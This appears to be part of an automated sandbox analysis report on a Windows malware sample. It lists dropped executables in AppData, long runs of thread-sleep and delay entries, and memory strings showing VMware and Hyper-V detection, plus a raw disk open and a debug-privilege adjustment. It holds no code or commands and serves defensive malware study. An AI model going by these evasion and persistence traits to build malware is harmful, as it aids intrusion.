Source: C:\Windows\System\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Windows\System\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

API coverage: 3.2 %

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe TID: 7300	Thread sleep count: 173 > 30	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7436	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System\explorer.exe TID: 7416	Thread sleep count: 777 > 30	Jump to behavior
Source: C:\Windows\System\explorer.exe TID: 7416	Thread sleep count: 409 > 30	Jump to behavior
Source: C:\Windows\System\svchost.exe TID: 7492	Thread sleep count: 122 > 30
Source: C:\Windows\System\svchost.exe TID: 7492	Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -44272185776902896s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 2300	Thread sleep count: 4695 > 30
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599796s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599597s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 2300	Thread sleep count: 5135 > 30
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -599011s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598793s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598679s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598577s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598356s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598240s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597997s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597766s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597641s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597521s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597186s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -597072s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596841s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596732s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596624s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596185s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -596075s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595638s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595529s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595421s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594483s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594375s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594250s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594125s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -594008s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -593904s >= -30000s
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe TID: 4624	Thread sleep time: -593797s >= -30000s
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe TID: 8124	Thread sleep count: 125 > 30
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe TID: 8124	Thread sleep count: 55 > 30
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 8152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -38738162554790034s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 8136	Thread sleep count: 3429 > 30
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 8136	Thread sleep count: 6393 > 30
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599653s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599534s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599407s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599282s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599157s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -599031s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598688s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596966s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596856s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596536s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596231s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -596016s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595688s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595576s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -593397s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -593281s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -593162s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -592959s >= -30000s
Source: C:\Users\user\AppData\Roaming\duencaj.exe TID: 5548	Thread sleep time: -592828s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599796
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599597
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599011
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598793
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598679
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598577
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598356
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598240
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597997
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597766
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597641
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597521
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597186
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597072
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596841
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596732
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596624
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596185
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596075
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595638
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595529
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595421
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594483
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594250
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594125
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594008
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 593904
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 593797
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599653
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596966
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596856
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596536
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596231
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595576
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595469
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593397
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593162
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 592959
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 592828

Source: duencaj.exe , 00000039.00000002.1830476026.00000000085EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1778697479.0000000008CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: CQEmuhtlKS
Source: duencaj.exe , 00000039.00000002.1830476026.00000000085EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[
Source: icsys.icn.exe, 00000002.00000003.1691923088.0000000000777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0
Source: svchost.exe, 00000003.00000002.2947247210.0000022D17441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2951988294.0000022D1CA59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1782214985.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: icsys.icn.exe, 0000003A.00000002.1780378581.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1782567556.0000000000777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: svchost.exe, 00000006.00000002.2944796817.000000000085E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;.: Th?n M? :. - Google Chrome;.: Th?n M? :. - Windows Internet Explorer;.: Th?n M? :. - Mozilla Firefox;md\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: duencaj.exe , 0000003F.00000002.2947319555.00000000015C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1778697479.0000000008CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: wO83MqemUwieHL3BGuv
Source: svchost.exe, 00000003.00000002.2947092918.0000022D17429000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1782567556.0000000000777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?b
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2946362977.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: icsys.icn.exe, 0000003A.00000002.1780378581.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\duencaj.exe

Code function: 63_2_06DC9668 LdrInitializeThunk,

63_2_06DC9668

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process token adjusted: Debug	Jump to behavior
